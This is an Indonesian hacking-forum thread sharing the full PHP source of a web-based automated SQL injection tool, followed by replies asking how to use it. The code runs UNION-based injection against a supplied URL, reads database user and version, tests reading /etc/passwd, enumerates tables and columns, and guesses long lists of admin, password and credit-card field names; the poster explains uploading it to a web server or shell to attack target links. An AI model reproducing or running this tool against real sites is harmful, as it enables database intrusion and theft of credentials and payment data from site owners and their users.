[PHP] SQL Injector Web Based

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.
Post Reply
User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

[PHP] SQL Injector Web Based

Post by shad.hckr » Tue Oct 25, 2011 11:15 pm

[PHP] SQL Injector Web Based

Originally coded by : xsauron@darkc0de
Modified by : Xblack

Image

Source code : http://xblack.biz/code.php?id=19

Code: Select all

<html>
<head><title>SQL Injector - Web Version</title>
<style type="text/css">
body{
    background-color: #000;
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
}
input,textarea{
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
    background-color: #999999;
    border:1px solid #000000;
}
#form {
    text-align:center;
    background-color:#222;
    padding:5px;
}
#error {
    text-align:center;
    background-color:#cc0000;
    padding:5px;
}
</style>
</head>
<body>

<h3>SQL Injector - Web Version - Darkc0de - Xblack</h3>
<form action="" method="POST">
<div id="form">Url : <input type="text" name="url" size="70"> End : <input type="text" name="end" size="3"><br>
<input type="submit" value="inject"><br><br>
Created by : darkc0de | Modified into web version by <a href="http://xblack.biz">Xblack</a> &copy; 2011</div>
</form>
<pre><?php
set_time_limit(0);
if(isset($_POST['url'])) {
    if(empty($_POST['end'])) {
        $end = "--";
    } else {
        $end = $_POST['end'];
    }    
    injector($_POST['url'],$end);
}

function injector($url,$end) {
        if(!preg_match("/darkc0de/", $url)) {
            print "<div id='error'>[?] Example: http://site.com/index.php?id=darkc0de&pg=news</div>\n";
        } else {
        
        switch($end) {
            case '--' :
            $end = '--';
            break;
            case '/*' :
            $end = '/*';
            break;
            default:
            $end = '--';
            break;
        }
        
        print "[-] URL : $url\n";
        print "[%] Trying connect to host...\n";
        if(con_host($url))
        {
            print "[+] Connect to host successful\n";
            print Get_Info($url);
            print "[-] Finding column number...\n";
            print "[-] Testing : ";
            inject_get_column_num($url, $end);
            
        } else {
            print "[!] Connect to host failed\n";
        }}
}
function inject_get_column_num($url, $end) {

    $max = 100;
    $stop = 0;
    
    $rurl = $url;
    
    for($i = 0; $i <= $max; $i++) {
    $word .= "concat(0x6461726B63306465,0x3a,".str_repeat($i,1).",0x3a),";
    $sql = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($word,",")."+$ending", $url);
    print "$i,";
    if(preg_match("/darkc0de:([0-9]+):/i", con_host($sql), $val)) {
        print "\n[+] Found column number: ".$i."\n";
        print "[+] Null Number: ".$val[1]."\n";
        save_log('injector.txt', "[-] Found column number: ".$i."\r\n");
        save_log('injector.txt', "[-] Null Number: ".$val[1]."\r\n");
        
        for($a = 0; $a <= $i; $a++) {
        $col .= "$a,";
         if($a == $val[1]) {
             $col = str_replace($val[1], "darkc0de", $col);
         }
        }
        $real = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($col,",")."+$ending", $rurl);
        print "[+] URL: ".$real."\n";
        save_log('injector.txt', "[+] URL: ".$real."\r\n");
        sql_info($real);
    }
  }
}
function sql_info($url) {
    
    $table_4 = array(
    'tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_user','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','密� ?','aut','author','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login','login_admin','login_admins','login_user','login_users','logins','logon','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','name','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','用户','obb_profiles','order','orders','parol','partner','partners','passes','password','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user','user_admin','user_info','user_list','user_login','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','username','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name','jos_user','table_user','email','mail','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins'
    );
    
    $column_4 = array(
'user','username','password','passwd','pass','cc_number','id','email','emri','fjalekalimi','pwd','user_name','customers_email_address','customers_password','user_password','name','user_pass','admin_user','admin_password','admin_pass','usern','user_n','users','login','logins','login_user','login_admin','login_username','user_username','user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid','admin_userid','adminusername','admin_username','adminname','admin_name','usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid','userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user','wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria','fjalekalimin','kodi','emer','ime','korisnik','korisnici','user1','administrator','administrator_name','mem_login','login_password','login_pass','login_passwd','login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w','user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin','user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password','memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass','mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username','my_name','my_password','my_email','cvvnumber','about','access','accnt','accnts','account','accounts','admin','adminemail','adminlogin','adminmail','admins','aid','aim','auth','authenticate','authentication','blog','cc_expires','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','config','contact','converge_pass_hash','converge_pass_salt','crack','customer','customers','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e-mail','emailaddress','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group','id_member','images','index','ip_address','last_ip','last_login','lastname','log','login_name','login_pw','loginkey','loginout','logo','md5hash','member','member_id','member_login_key','member_name','memberid','membername','members','new','news','nick','number','nummer','pass_hash','passwordsalt','passwort','personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','un','user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword','user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm','userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name','xar_pass'
);
    
    print "[-] Getting sql server information...\n";
    $info = array(
    'User' => 'user()',
    'Database' => 'database()',
    'Version' => 'version()'
    );
    
    $rurl = $url;
    $rurl2 = $url;
    $rurl3 = $url;
    
    $ending = '--';
    
    foreach($info as $get => $val) {
        if(preg_match("/darkc0de:(.*?):darkc0de/", con_host("".str_replace("darkc0de", "".$string."+concat(0x6461726B63306465,0x3a,$val,0x3a,0x6461726B63306465)+", $url).""), $value)) {
            print "[-] $get: $value[1]\n";
            save_log('injector.txt', "[-] $get: $value[1]\r\n");
        }}
        print "[-] Testing load file...\n";
    $load = str_replace("darkc0de", "".$string."load_file(0x2f6574632f706173737764)", $rurl);
    if(preg_match("/root:x:/", con_host($load))) {
        print "[-] w00t w00t, you have permission to load file!\n";
        print "[-] URL: $load\n";
        save_log('injector.txt', "[-] w00t w00t, you have permission to load file!\r\n");
        save_log('injector.txt', "[-] URL: $load\r\n");
    } else {
        print "[-] No permission to load file :( \n";
    }
            if(preg_match("/darkc0de:5.(.*?):darkc0de/", con_host("".str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,version(),0x3a,0x6461726B63306465)", $url).""), $value)) {
                print "[-] MySQL Server version is : 5.x\n";
                print "[-] Start extract the column and table...\n";
                print "[-] Table : Column\n";
                $url = str_replace("darkc0de", "concat(char(88,98,108,97,99,107,58),count(table_name),char(58,88,98,108,97,99,107))", $url);
                //$url = str_replace($ending, "+from+information_schema.tables+where+table_schema=database()+$ending", $url);
                $url = "$url+from+information_schema.tables+where+table_schema=database()$ending";
                if(preg_match("/Xblack:([0-9]+):Xblack/", con_host($url), $totaltbl)) {
                   print "[+] Total Table Found: ".$totaltbl[1]."\n";
                   save_log('injector.txt', "[+] Total Table Found: ".$totaltbl[1]."\r\n");
                   for($i = 0; $i <= $totaltbl[1]; $i++) {
                  $urlxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),table_name,char(58,88,98,108,97,99,107))",$rurl2);
                  $urlxx = $urlxx."from+information_schema.tables+where+table_schema=database()+limit+".$i.",1+$ending";
                  if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxx), $table_name)) {
                      print "[-] Table: ".$table_name[1]."\n";
                      save_log('injector.txt', "[-] Table: ".$table_name[1]."\r\n");
                    $urlxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),count(column_name),char(58,88,98,108,97,99,107))",$rurl2);
                    $urlxxx = $urlxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+$ending";
                      if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxx), $totalclm)) {
                          print "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\n";
                          save_log('injector.txt', "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\r\n");
                          for($a = 0; $a <= $totalclm[1]; $a++) {
                            $urlxxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),column_name,char(58,88,98,108,97,99,107))",$rurl3);
                            $urlxxxx = $urlxxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+limit+".$a.",1+$ending";
                              if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxxx), $column_name)) {
                                  print "".$column_name[1].",";
                                  save_log('injector.txt', "".$column_name[1].",");
                             }
                          }
                          print "\n";
                          save_log('injector.txt', "\r\n");
                      }
                  }
                   }
                   
                }

            } else {
                print "[-] MySQL Server version is : 4.x\n";
                print "[-] Start automatic column and table finder...\n";
                print "[-] This may take a few minutes or hours to finish\n";
                foreach($table_4 as $table) {
                    $i++;
                    $url = str_replace("concat(0x696E6A336374)", "concat(0x6461726B63306465)", $rurl);
                    $url = str_replace($ending, "+from+".$table."+$ending", $url);
                    if(preg_match("/darkc0de/", con_host($url))) {
                        print "[$i] Found Table : $table\n";
                        save_log('injector.txt', "[-] Found Table : $table\r\n");
                        print "[-] Finding column...\n";
                         foreach($column_4 as $column) {
                             $url = str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,$column,0x3a,0x6461726B63306465)", $rurl);
                            $url = str_replace("$ending", "+from+".$table."+$ending", $url);
                            if(preg_match("/darkc0de:(.*?):darkc0de/", con_host($url))) {
                                print "[-] Found column: $column\n";
                                save_log('injector.txt', "[-] Found column: $column\r\n");
                            }
                         }
                         save_log('injector.txt', "\r\n");
                         print "[-] Done searching column inside $table table\n";
                        
                    }
                }
            }
    print "[-] Done\n";
    print "[-] See 'injector.txt' to see the log\n";
    exit;
}
function HexValue($text) {
     for($i = 0; $i < strlen($text); $i++) {
         $a .= dechex(ord($text[$i]));
     }
     return $a;
}
function Get_Info($site) {
    if($info = con_host($site)) {
        preg_match("/Content-Type:(.+)/", $info, $type);
        preg_match("/Server:(.+)/", $info, $server);
        print "[-] $type[0]\n";
        print "[-] $server[0]\n";
        $ip = parse_url($site);
        print "[-] IP: ".gethostbyname($ip['host'])."\n";
    }
}
function con_host($host) {
    $ch = curl_init($host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54');
    
    $pg = curl_exec($ch);
    if($pg){
        return $pg;
    } else {
        return false;
    }
}
function save_log($fname = '', $text = '') {
    $file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a');
    $write = @fwrite($file, $text, '60000000');
    if($write) {
        return 1;
    } else {
        return 0;
    }
}?>
</body>
<html>

NoThee
Posts: 9
Joined: Sun Sep 18, 2011 1:12 am

Re: [PHP] SQL Injector Web Based

Post by NoThee » Wed Oct 26, 2011 12:23 am

om mau tanya cara pake kodenya ntu di apain y ane bingung sering ng'liat code2 php kya gt tp gk tau hrs di apain...?
tolong y jawabannya...sorry newbie

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: [PHP] SQL Injector Web Based

Post by shad.hckr » Wed Oct 26, 2011 12:39 am

1. save code diatas make extensi php (ex : sqli.php )
2. upload ke web/shell
3. buka di browser.
4. masukin link yang mau di inject ( ex : http://domain.com/file.php?var=darkc0de )

NoThee
Posts: 9
Joined: Sun Sep 18, 2011 1:12 am

Re: [PHP] SQL Injector Web Based

Post by NoThee » Wed Oct 26, 2011 12:49 am

upload ke web/shell gmn caranya...?

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: [PHP] SQL Injector Web Based

Post by shad.hckr » Wed Oct 26, 2011 5:07 am

NoThee wrote:upload ke web/shell gmn caranya...?
cari di thread yang laen ada banyak tutorialnya.

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: [PHP] SQL Injector Web Based

Post by poni » Wed Oct 26, 2011 5:20 am

keren pak shad
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: [PHP] SQL Injector Web Based

Post by Digital Cat » Wed Oct 26, 2011 7:29 am

Top Markotop..

ijin Copy Code nya ya..

:Dkalo ada yg udah upload ..

bagi linknya yach..

lagi PW ki PW - Posisi wenak.

yuanryuzaki
Posts: 9
Joined: Thu Nov 10, 2011 4:45 pm

Re: [PHP] SQL Injector Web Based

Post by yuanryuzaki » Fri Nov 11, 2011 1:38 am

udah ane coba mase,,, dan berhasil di upload ke web :D

oramelu2
Posts: 3
Joined: Mon Jan 02, 2012 10:52 pm

Re: [PHP] SQL Injector Web Based

Post by oramelu2 » Mon Jan 02, 2012 11:06 pm

bs dijalanin dan sukses sebagaimana mestinya gan?

googlegirl
Posts: 4
Joined: Thu Jan 05, 2012 7:33 am

Re: [PHP] SQL Injector Web Based

Post by googlegirl » Thu Jan 05, 2012 8:15 am

maaf abang2 semua..saya bru dlm nie...gimana nk guna sql ini dan dimana gwa maw d.load sql injection??

Post Reply

Return to “Tools For Hacking - Security & Computer Forensic”